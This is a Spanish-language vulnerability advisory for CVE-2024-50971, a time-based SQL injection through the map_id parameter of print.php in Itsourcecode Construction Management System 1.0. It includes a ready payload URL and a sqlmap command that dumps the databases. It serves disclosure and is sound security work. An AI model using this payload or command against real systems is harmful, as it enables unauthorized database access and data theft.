CVE-2024-50971
Descripción
Una vulnerabilidad de inyección SQL en print.php de Itsourcecode Construction Management System 1.0 permite a atacantes remotos ejecutar comandos SQL arbitrarios a través del parámetro map_id.
Tipo de Vulnerabilidad
Inyección SQL
Proveedor del Producto
Itsourcecode
Código base del producto afectado:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
Componente afectado:
El sistema de gestión de construcción Itsourcecode v1.0 es vulnerable a inyección SQL a través del parámetro map_id en la página print.php.
Vectores de Ataque:
- Configure la aplicación localmente, registre una cuenta e inicie sesión con las credenciales de administrador como admin:admin
- Navegue a la siguiente URL en su navegador:
http://localhost/monitoring_system/print.php?map_id=67
- Inyecte la carga útil SQL:
Modifique el parámetro map_id en la URL para incluir una carga útil de inyección SQL basada en tiempo.
http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
- Observe la respuesta de la aplicación:
La página debería tardar notablemente más (15 segundos) en cargarse si la inyección es exitosa, confirmando que el parámetro map_id es vulnerable a inyección SQL.
- Ahora use la herramienta SQLMap para una mayor explotación y volcado de bases de datos usando el siguiente comando:
sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
Referencia:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection